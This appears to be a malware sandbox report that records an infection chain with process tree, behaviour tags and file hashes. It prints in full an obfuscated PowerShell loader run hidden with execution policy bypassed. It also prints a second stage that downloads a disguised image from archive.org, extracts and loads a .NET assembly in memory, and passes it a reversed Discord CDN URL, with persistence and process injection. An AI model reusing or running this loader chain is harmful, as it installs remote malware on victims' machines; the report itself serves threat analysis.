㈿ ∿ ⇐bQBC⊤ ⪛ ㈿ ∿ ⇐GE⊤ ⪛ ㈿ ∿ ⇐cwBl⊤ ⪛ ㈿ ∿ ⇐DY⊤ ⪛ ㈿ ∿ ⇐N⊤ ⪛ ㈿ ∿ ⇐BT⊤ ⪛ ㈿ ∿ ⇐HQ⊤ ⪛ ㈿ ∿ ⇐cgBp⊤ ⪛ ㈿ ∿ ⇐G4⊤ ⪛ ㈿ ∿ ⇐Zw⊤ ⪛ ㈿ ∿ ⇐o⊤ ⪛ ㈿ ∿ ⇐CQ⊤ ⪛ ㈿ ∿ ⇐YgBh⊤ ⪛ ㈿ ∿ ⇐HM⊤ ⪛ ㈿ ∿ ⇐ZQ⊤ ⪛ ㈿ ∿ ⇐2⊤ ⪛ ㈿ ∿ ⇐DQ⊤ ⪛ ㈿ ∿ ⇐QwBv⊤ ⪛ ㈿ ∿ ⇐G0⊤ ⪛ ㈿ ∿ ⇐bQBh⊤ ⪛ ㈿ ∿ ⇐G4⊤ ⪛ ㈿ ∿ ⇐Z⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐p⊤ ⪛ ㈿ ∿ ⇐Ds⊤ ⪛ ㈿ ∿ ⇐J⊤ ⪛ ㈿ ∿ ⇐Bs⊤ ⪛ ㈿ ∿ ⇐G8⊤ ⪛ ㈿ ∿ ⇐YQBk⊤ ⪛ ㈿ ∿ ⇐GU⊤ ⪛ ㈿ ∿ ⇐Z⊤ ⪛ ㈿ ∿ ⇐BB⊤ ⪛ ㈿ ∿ ⇐HM⊤ ⪛ ㈿ ∿ ⇐cwBl⊤ ⪛ ㈿ ∿ ⇐G0⊤ ⪛ ㈿ ∿ ⇐YgBs⊤ ⪛ ㈿ ∿ ⇐Hk⊤ ⪛ ㈿ ∿ ⇐I⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐9⊤ ⪛ ㈿ ∿ ⇐C⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐WwBT⊤ ⪛ ㈿ ∿ ⇐Hk⊤ ⪛ ㈿ ∿ ⇐cwB0⊤ ⪛ ㈿ ∿ ⇐GU⊤ ⪛ ㈿ ∿ ⇐bQ⊤ ⪛ ㈿ ∿ ⇐u⊤ ⪛ ㈿ ∿ ⇐FI⊤ ⪛ ㈿ ∿ ⇐ZQBm⊤ ⪛ ㈿ ∿ ⇐Gw⊤ ⪛ ㈿ ∿ ⇐ZQBj⊤ ⪛ ㈿ ∿ ⇐HQ⊤ ⪛ ㈿ ∿ ⇐aQBv⊤ ⪛ ㈿ ∿ ⇐G4⊤ ⪛ ㈿ ∿ ⇐LgBB⊤ ⪛ ㈿ ∿ ⇐HM⊤ ⪛ ㈿ ∿ ⇐cwBl⊤ ⪛ ㈿ ∿ ⇐G0⊤ ⪛ ㈿ ∿ ⇐YgBs⊤ ⪛ ㈿ ∿ ⇐Hk⊤ ⪛ ㈿ ∿ ⇐XQ⊤ ⪛ ㈿ ∿ ⇐6⊤ ⪛ ㈿ ∿ ⇐Do⊤ ⪛ ㈿ ∿ ⇐T⊤ ⪛ ㈿ ∿ ⇐Bv⊤ ⪛ ㈿ ∿ ⇐GE⊤ ⪛ ㈿ ∿ ⇐Z⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐o⊤ ⪛ ㈿ ∿ ⇐CQ⊤ ⪛ ㈿ ∿ ⇐YwBv⊤ ⪛ ㈿ ∿ ⇐G0⊤ ⪛ ㈿ ∿ ⇐bQBh⊤ ⪛ ㈿ ∿ ⇐G4⊤ ⪛ ㈿ ∿ ⇐Z⊤ ⪛ ㈿ ∿ ⇐BC⊤ ⪛ ㈿ ∿ ⇐Hk⊤ ⪛ ㈿ ∿ ⇐d⊤ ⪛ ㈿ ∿ ⇐Bl⊤ ⪛ ㈿ ∿ ⇐HM⊤ ⪛ ㈿ ∿ ⇐KQ⊤ ⪛ ㈿ ∿ ⇐7⊤ ⪛ ㈿ ∿ ⇐CQ⊤ ⪛ ㈿ ∿ ⇐d⊤ ⪛ ㈿ ∿ ⇐B5⊤ ⪛ ㈿ ∿ ⇐H⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐ZQ⊤ ⪛ ㈿ ∿ ⇐g⊤ ⪛ ㈿ ∿ ⇐D0⊤ ⪛ ㈿ ∿ ⇐I⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐k⊤ ⪛ ㈿ ∿ ⇐Gw⊤ ⪛ ㈿ ∿ ⇐bwBh⊤ ⪛ ㈿ ∿ ⇐GQ⊤ ⪛ ㈿ ∿ ⇐ZQBk⊤ ⪛ ㈿ ∿ ⇐EE⊤ ⪛ ㈿ ∿ ⇐cwBz⊤ ⪛ ㈿ ∿ ⇐GU⊤ ⪛ ㈿ ∿ ⇐bQBi⊤ ⪛ ㈿ ∿ ⇐Gw⊤ ⪛ ㈿ ∿ ⇐eQ⊤ ⪛ ㈿ ∿ ⇐u⊤ ⪛ ㈿ ∿ ⇐Ec⊤ ⪛ ㈿ ∿ ⇐ZQB0⊤ ⪛ ㈿ ∿ ⇐FQ⊤ ⪛ ㈿ ∿ ⇐eQBw⊤ ⪛ ㈿ ∿ ⇐GU⊤ ⪛ ㈿ ∿ ⇐K⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐n⊤ ⪛ ㈿ ∿ ⇐GQ⊤ ⪛ ㈿ ∿ ⇐bgBs⊤ ⪛ ㈿ ∿ ⇐Gk⊤ ⪛ ㈿ ∿ ⇐Yg⊤ ⪛ ㈿ ∿ ⇐u⊤ ⪛ ㈿ ∿ ⇐Ek⊤ ⪛ ㈿ ∿ ⇐Tw⊤ ⪛ ㈿ ∿ ⇐u⊤ ⪛ ㈿ ∿ ⇐Eg⊤ ⪛ ㈿ ∿ ⇐bwBt⊤ ⪛ ㈿ ∿ ⇐GU⊤ ⪛ ㈿ ∿ ⇐Jw⊤ ⪛ ㈿ ∿ ⇐p⊤ ⪛ ㈿ ∿ ⇐Ds⊤ ⪛ ㈿ ∿ ⇐J⊤ ⪛ ㈿ ∿ ⇐Bt⊤ ⪛ ㈿ ∿ ⇐GU⊤ ⪛ ㈿ ∿ ⇐d⊤ ⪛ ㈿ ∿ ⇐Bo⊤ ⪛ ㈿ ∿ ⇐G8⊤ ⪛ ㈿ ∿ ⇐Z⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐g⊤ ⪛ ㈿ ∿ ⇐D0⊤ ⪛ ㈿ ∿ ⇐I⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐k⊤ ⪛ ㈿ ∿ ⇐HQ⊤ ⪛ ㈿ ∿ ⇐eQBw⊤ ⪛ ㈿ ∿ ⇐GU⊤ ⪛ ㈿ ∿ ⇐LgBH⊤ ⪛ ㈿ ∿ ⇐GU⊤ ⪛ ㈿ ∿ ⇐d⊤ ⪛ ㈿ ∿ ⇐BN⊤ ⪛ ㈿ ∿ ⇐GU⊤ ⪛ ㈿ ∿ ⇐d⊤ ⪛ ㈿ ∿ ⇐Bo⊤ ⪛ ㈿ ∿ ⇐G8⊤ ⪛ ㈿ ∿ ⇐Z⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐o⊤ ⪛ ㈿ ∿ ⇐Cc⊤ ⪛ ㈿ ∿ ⇐VgBB⊤ ⪛ ㈿ ∿ ⇐Ek⊤ ⪛ ㈿ ∿ ⇐Jw⊤ ⪛ ㈿ ∿ ⇐p⊤ ⪛ ㈿ ∿ ⇐C4⊤ ⪛ ㈿ ∿ ⇐SQBu⊤ ⪛ ㈿ ∿ ⇐HY⊤ ⪛ ㈿ ∿ ⇐bwBr⊤ ⪛ ㈿ ∿ ⇐GU⊤ ⪛ ㈿ ∿ ⇐K⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐k⊤ ⪛ ㈿ ∿ ⇐G4⊤ ⪛ ㈿ ∿ ⇐dQBs⊤ ⪛ ㈿ ∿ ⇐Gw⊤ ⪛ ㈿ ∿ ⇐L⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐g⊤ ⪛ ㈿ ∿ ⇐Fs⊤ ⪛ ㈿ ∿ ⇐bwBi⊤ ⪛ ㈿ ∿ ⇐Go⊤ ⪛ ㈿ ∿ ⇐ZQBj⊤ ⪛ ㈿ ∿ ⇐HQ⊤ ⪛ ㈿ ∿ ⇐WwBd⊤ ⪛ ㈿ ∿ ⇐F0⊤ ⪛ ㈿ ∿ ⇐I⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐o⊤ ⪛ ㈿ ∿ ⇐Cc⊤ ⪛ ㈿ ∿ ⇐JgBh⊤ ⪛ ㈿ ∿ ⇐DY⊤ ⪛ ㈿ ∿ ⇐NQBk⊤ ⪛ ㈿ ∿ ⇐GU⊤ ⪛ ㈿ ∿ ⇐ZQ⊤ ⪛ ㈿ ∿ ⇐x⊤ ⪛ ㈿ ∿ ⇐DQ⊤ ⪛ ㈿ ∿ ⇐YgBk⊤ ⪛ ㈿ ∿ ⇐DI⊤ ⪛ ㈿ ∿ ⇐N⊤ ⪛ ㈿ ∿ ⇐Bh⊤ ⪛ ㈿ ∿ ⇐GU⊤ ⪛ ㈿ ∿ ⇐NQ⊤ ⪛ ㈿ ∿ ⇐4⊤ ⪛ ㈿ ∿ ⇐D⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐ZQBi⊤ ⪛ ㈿ ∿ ⇐DQ⊤ ⪛ ㈿ ∿ ⇐YgBm⊤ ⪛ ㈿ ∿ ⇐Dk⊤ ⪛ ㈿ ∿ ⇐NQ⊤ ⪛ ㈿ ∿ ⇐3⊤ ⪛ ㈿ ∿ ⇐GY⊤ ⪛ ㈿ ∿ ⇐NQBl⊤ ⪛ ㈿ ∿ ⇐Dc⊤ ⪛ ㈿ ∿ ⇐Z⊤ ⪛ ㈿ ∿ ⇐Bi⊤ ⪛ ㈿ ∿ ⇐GI⊤ ⪛ ㈿ ∿ ⇐OQBi⊤ ⪛ ㈿ ∿ ⇐DQ⊤ ⪛ ㈿ ∿ ⇐OQBk⊤ ⪛ ㈿ ∿ ⇐GE⊤ ⪛ ㈿ ∿ ⇐ZgBk⊤ ⪛ ㈿ ∿ ⇐Dc⊤ ⪛ ㈿ ∿ ⇐NgBk⊤ ⪛ ㈿ ∿ ⇐GU⊤ ⪛ ㈿ ∿ ⇐ZQ⊤ ⪛ ㈿ ∿ ⇐3⊤ ⪛ ㈿ ∿ ⇐DM⊤ ⪛ ㈿ ∿ ⇐N⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐4⊤ ⪛ ㈿ ∿ ⇐DQ⊤ ⪛ ㈿ ∿ ⇐YwBj⊤ ⪛ ㈿ ∿ ⇐Dc⊤ ⪛ ㈿ ∿ ⇐NQ⊤ ⪛ ㈿ ∿ ⇐2⊤ ⪛ ㈿ ∿ ⇐GU⊤ ⪛ ㈿ ∿ ⇐Mg⊤ ⪛ ㈿ ∿ ⇐y⊤ ⪛ ㈿ ∿ ⇐GI⊤ ⪛ ㈿ ∿ ⇐M⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐2⊤ ⪛ ㈿ ∿ ⇐Dk⊤ ⪛ ㈿ ∿ ⇐Nw⊤ ⪛ ㈿ ∿ ⇐3⊤ ⪛ ㈿ ∿ ⇐D0⊤ ⪛ ㈿ ∿ ⇐bQBo⊤ ⪛ ㈿ ∿ ⇐CY⊤ ⪛ ㈿ ∿ ⇐Yw⊤ ⪛ ㈿ ∿ ⇐5⊤ ⪛ ㈿ ∿ ⇐GI⊤ ⪛ ㈿ ∿ ⇐Ng⊤ ⪛ ㈿ ∿ ⇐w⊤ ⪛ ㈿ ∿ ⇐GQ⊤ ⪛ ㈿ ∿ ⇐Ng⊤ ⪛ ㈿ ∿ ⇐2⊤ ⪛ ㈿ ∿ ⇐D0⊤ ⪛ ㈿ ∿ ⇐cwBp⊤ ⪛ ㈿ ∿ ⇐CY⊤ ⪛ ㈿ ∿ ⇐Yw⊤ ⪛ ㈿ ∿ ⇐x⊤ ⪛ ㈿ ∿ ⇐GQ⊤ ⪛ ㈿ ∿ ⇐Yg⊤ ⪛ ㈿ ∿ ⇐x⊤ ⪛ ㈿ ∿ ⇐GQ⊤ ⪛ ㈿ ∿ ⇐Ng⊤ ⪛ ㈿ ∿ ⇐2⊤ ⪛ ㈿ ∿ ⇐D0⊤ ⪛ ㈿ ∿ ⇐e⊤ ⪛ ㈿ ∿ ⇐Bl⊤ ⪛ ㈿ ∿ ⇐D8⊤ ⪛ ㈿ ∿ ⇐d⊤ ⪛ ㈿ ∿ ⇐B4⊤ ⪛ ㈿ ∿ ⇐HQ⊤ ⪛ ㈿ ∿ ⇐LgBm⊤ ⪛ ㈿ ∿ ⇐GQ⊤ ⪛ ㈿ ∿ ⇐c⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐u⊤ ⪛ ㈿ ∿ ⇐Dk⊤ ⪛ ㈿ ∿ ⇐Mg⊤ ⪛ ㈿ ∿ ⇐5⊤ ⪛ ㈿ ∿ ⇐DM⊤ ⪛ ㈿ ∿ ⇐O⊤ ⪛ ㈿ ∿ ⇐Bf⊤ ⪛ ㈿ ∿ ⇐Ek⊤ ⪛ ㈿ ∿ ⇐Uw⊤ ⪛ ㈿ ∿ ⇐v⊤ ⪛ ㈿ ∿ ⇐DQ⊤ ⪛ ㈿ ∿ ⇐MQ⊤ ⪛ ㈿ ∿ ⇐2⊤ ⪛ ㈿ ∿ ⇐D⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐Ng⊤ ⪛ ㈿ ∿ ⇐1⊤ ⪛ ㈿ ∿ ⇐Dg⊤ ⪛ ㈿ ∿ ⇐Mw⊤ ⪛ ㈿ ∿ ⇐5⊤ ⪛ ㈿ ∿ ⇐Dg⊤ ⪛ ㈿ ∿ ⇐OQ⊤ ⪛ ㈿ ∿ ⇐w⊤ ⪛ ㈿ ∿ ⇐DU⊤ ⪛ ㈿ ∿ ⇐OQ⊤ ⪛ ㈿ ∿ ⇐2⊤ ⪛ ㈿ ∿ ⇐Dg⊤ ⪛ ㈿ ∿ ⇐Nw⊤ ⪛ ㈿ ∿ ⇐y⊤ ⪛ ㈿ ∿ ⇐DE⊤ ⪛ ㈿ ∿ ⇐Lw⊤ ⪛ ㈿ ∿ ⇐x⊤ ⪛ ㈿ ∿ ⇐DQ⊤ ⪛ ㈿ ∿ ⇐M⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐0⊤ ⪛ ㈿ ∿ ⇐DY⊤ ⪛ ㈿ ∿ ⇐M⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐4⊤ ⪛ ㈿ ∿ ⇐D⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐M⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐y⊤ ⪛ ㈿ ∿ ⇐DY⊤ ⪛ ㈿ ∿ ⇐Mw⊤ ⪛ ㈿ ∿ ⇐x⊤ ⪛ ㈿ ∿ ⇐Dg⊤ ⪛ ㈿ ∿ ⇐MQ⊤ ⪛ ㈿ ∿ ⇐4⊤ ⪛ ㈿ ∿ ⇐Dc⊤ ⪛ ㈿ ∿ ⇐Mg⊤ ⪛ ㈿ ∿ ⇐x⊤ ⪛ ㈿ ∿ ⇐C8⊤ ⪛ ㈿ ∿ ⇐cwB0⊤ ⪛ ㈿ ∿ ⇐G4⊤ ⪛ ㈿ ∿ ⇐ZQBt⊤ ⪛ ㈿ ∿ ⇐Gg⊤ ⪛ ㈿ ∿ ⇐YwBh⊤ ⪛ ㈿ ∿ ⇐HQ⊤ ⪛ ㈿ ∿ ⇐d⊤ ⪛ ㈿ ∿ ⇐Bh⊤ ⪛ ㈿ ∿ ⇐C8⊤ ⪛ ㈿ ∿ ⇐bQBv⊤ ⪛ ㈿ ∿ ⇐GM⊤ ⪛ ㈿ ∿ ⇐LgBw⊤ ⪛ ㈿ ∿ ⇐H⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐YQBk⊤ ⪛ ㈿ ∿ ⇐HI⊤ ⪛ ㈿ ∿ ⇐bwBj⊤ ⪛ ㈿ ∿ ⇐HM⊤ ⪛ ㈿ ∿ ⇐aQBk⊤ ⪛ ㈿ ∿ ⇐C4⊤ ⪛ ㈿ ∿ ⇐bgBk⊤ ⪛ ㈿ ∿ ⇐GM⊤ ⪛ ㈿ ∿ ⇐Lw⊤ ⪛ ㈿ ∿ ⇐v⊤ ⪛ ㈿ ∿ ⇐Do⊤ ⪛ ㈿ ∿ ⇐cwBw⊤ ⪛ ㈿ ∿ ⇐HQ⊤ ⪛ ㈿ ∿ ⇐d⊤ ⪛ ㈿ ∿ ⇐Bo⊤ ⪛ ㈿ ∿ ⇐Cc⊤ ⪛ ㈿ ∿ ⇐I⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐s⊤ ⪛ ㈿ ∿ ⇐C⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐Jw⊤ ⪛ ㈿ ∿ ⇐x⊤ ⪛ ㈿ ∿ ⇐Cc⊤ ⪛ ㈿ ∿ ⇐I⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐s⊤ ⪛ ㈿ ∿ ⇐C⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐JwBD⊤ ⪛ ㈿ ∿ ⇐Do⊤ ⪛ ㈿ ∿ ⇐X⊤ ⪛ ㈿ ∿ ⇐BQ⊤ ⪛ ㈿ ∿ ⇐HI⊤ ⪛ ㈿ ∿ ⇐bwBn⊤ ⪛ ㈿ ∿ ⇐HI⊤ ⪛ ㈿ ∿ ⇐YQBt⊤ ⪛ ㈿ ∿ ⇐EQ⊤ ⪛ ㈿ ∿ ⇐YQB0⊤ ⪛ ㈿ ∿ ⇐GE⊤ ⪛ ㈿ ∿ ⇐X⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐n⊤ ⪛ ㈿ ∿ ⇐C⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐L⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐g⊤ ⪛ ㈿ ∿ ⇐Cc⊤ ⪛ ㈿ ∿ ⇐cgBl⊤ ⪛ ㈿ ∿ ⇐H⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐ZQBu⊤ ⪛ ㈿ ∿ ⇐GQ⊤ ⪛ ㈿ ∿ ⇐aQBt⊤ ⪛ ㈿ ∿ ⇐GU⊤ ⪛ ㈿ ∿ ⇐bgB0⊤ ⪛ ㈿ ∿ ⇐G8⊤ ⪛ ㈿ ∿ ⇐Jw⊤ ⪛ ㈿ ∿ ⇐s⊤ ⪛ ㈿ ∿ ⇐Cc⊤ ⪛ ㈿ ∿ ⇐QQBk⊤ ⪛ ㈿ ∿ ⇐GQ⊤ ⪛ ㈿ ∿ ⇐SQBu⊤ ⪛ ㈿ ∿ ⇐F⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐cgBv⊤ ⪛ ㈿ ∿ ⇐GM⊤ ⪛ ㈿ ∿ ⇐ZQBz⊤ ⪛ ㈿ ∿ ⇐HM⊤ ⪛ ㈿ ∿ ⇐Mw⊤ ⪛ ㈿ ∿ ⇐y⊤ ⪛ ㈿ ∿ ⇐Cc⊤ ⪛ ㈿ ∿ ⇐L⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐n⊤ ⪛ ㈿ ∿ ⇐Cc⊤ ⪛ ㈿ ∿ ⇐KQ⊤ ⪛ ㈿ ∿ ⇐p⊤ ⪛ ㈿ ∿ ⇐⊤ ⪛ ㈿ ∿ ⇐==';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('⊤ ⪛ ㈿ ∿ ⇐','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&a65dee14bd24ae580eb4bf957f5e7dbb9b49dafd76dee73484cc756e22b06977=mh&c9b60d66=si&c1db1d66=xe?txt.fdp.92938_IS/4160658398905968721/1404608002631818721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'rependimento','AddInProcess32',''))"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\rependimento.vbs"4⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- System Location Discovery: System Language Discovery
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
64B
MD51a11402783a8686e08f8fa987dd07bca
SHA1580df3865059f4e2d8be10644590317336d146ce
SHA2569b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0
SHA5125f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.1MB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB